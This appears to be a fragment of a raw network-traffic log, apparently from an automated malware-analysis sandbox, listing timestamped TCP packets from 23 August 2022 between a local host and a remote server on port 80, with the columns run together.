                                                                                                                                                                      Aug 23, 2022 18:27:52.108779907 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.108805895 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.108830929 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.108849049 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.108855963 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.108871937 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.108881950 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.108891010 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.108910084 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.108931065 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.108936071 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.108943939 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.108963966 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.108973026 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.108990908 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.108999968 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.109018087 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.109026909 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.109044075 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.109052896 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.109069109 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.109077930 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.109095097 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.109106064 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.109121084 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.109129906 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.109147072 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.109158039 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.109172106 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.109184980 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.109198093 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.109206915 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.109246016 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.112483025 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.112579107 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.112579107 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.112605095 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.112622023 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.112632036 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.112637043 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.112668037 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.139736891 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.139774084 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.139801025 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.139816999 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.139828920 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.139848948 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.139853954 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.139857054 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.139878035 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.139885902 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.139899969 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.139914036 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.139930010 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.139944077 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.139951944 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.139971972 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.139981985 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.139998913 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140026093 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140026093 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140050888 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140053034 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140077114 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140079021 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140101910 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140105009 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140121937 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140132904 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140141964 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140158892 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140167952 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140186071 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140194893 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140219927 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140264034 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140290022 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140302896 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140316010 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140335083 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140340090 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140360117 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140367031 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140393972 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140409946 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140419960 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140429020 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140448093 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140455008 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140474081 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140480995 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140501022 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140511036 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140527964 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140538931 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140554905 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140573025 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140580893 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140592098 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140608072 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140631914 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140635014 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140640020 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140661955 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140675068 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140687943 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140698910 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140712976 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140734911 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140741110 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140764952 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140768051 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140790939 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140796900 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140815973 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140822887 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140830040 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140849113 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140855074 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140875101 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140878916 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140901089 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140907049 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140952110 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140957117 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.140978098 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.140983105 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141002893 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141009092 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141028881 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141045094 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141056061 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141073942 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141083002 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141094923 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141108990 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141118050 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141134977 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141141891 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141161919 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141166925 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141196012 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141202927 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141222954 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141228914 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141247988 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141252995 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141273975 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141280890 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141299963 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141314030 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141328096 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141338110 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141354084 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141371012 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141377926 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141390085 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141406059 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141408920 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141432047 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141439915 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141459942 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141467094 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141485929 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141490936 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141513109 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141516924 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141540051 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141542912 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141566038 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141570091 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141592026 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141599894 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141618967 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.141623974 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.141654015 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.142386913 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142457008 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.142504930 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142530918 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142554998 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142580032 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142638922 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142656088 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.142663956 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142683983 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.142689943 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142710924 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.142715931 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142725945 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.142741919 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142766953 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142790079 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142815113 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142841101 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.142848015 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.142874956 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.143429041 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.143455982 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.143492937 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.143507957 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.143518925 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.143543959 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.143557072 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.143583059 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.143591881 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.143609047 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.143616915 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.143635988 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.143644094 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.143661976 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.143670082 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.143687010 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.143696070 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.143719912 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.144695997 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.144730091 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.144757032 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.144767046 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.144783974 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.144784927 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.144793034 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.144813061 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.144820929 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.144841909 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.144849062 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.144866943 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.144886017 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.144907951 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.145962000 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.145992041 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.146018028 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.146030903 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.146045923 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.146049023 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.146056890 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.146073103 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.146081924 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.146100998 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.146106005 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.146128893 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.146136045 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.146156073 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.146164894 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.146183014 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.146189928 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.146212101 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.146220922 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.146250963 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.147948980 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.147978067 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148046017 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148061991 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148087978 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148097038 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148102045 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148114920 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148127079 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148142099 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148150921 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148168087 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148194075 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148195028 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148212910 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148221970 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148241997 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148248911 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148260117 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148276091 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148288012 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148302078 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148313046 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148329020 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148354053 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148356915 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148375988 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148380995 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148391962 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148410082 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148418903 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148436069 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148448944 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148462057 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148484945 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148488045 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148508072 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148513079 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148525000 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148540020 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148550987 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148566008 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148577929 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.148591995 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.148617029 CEST804994788.198.122.116192.168.2.6
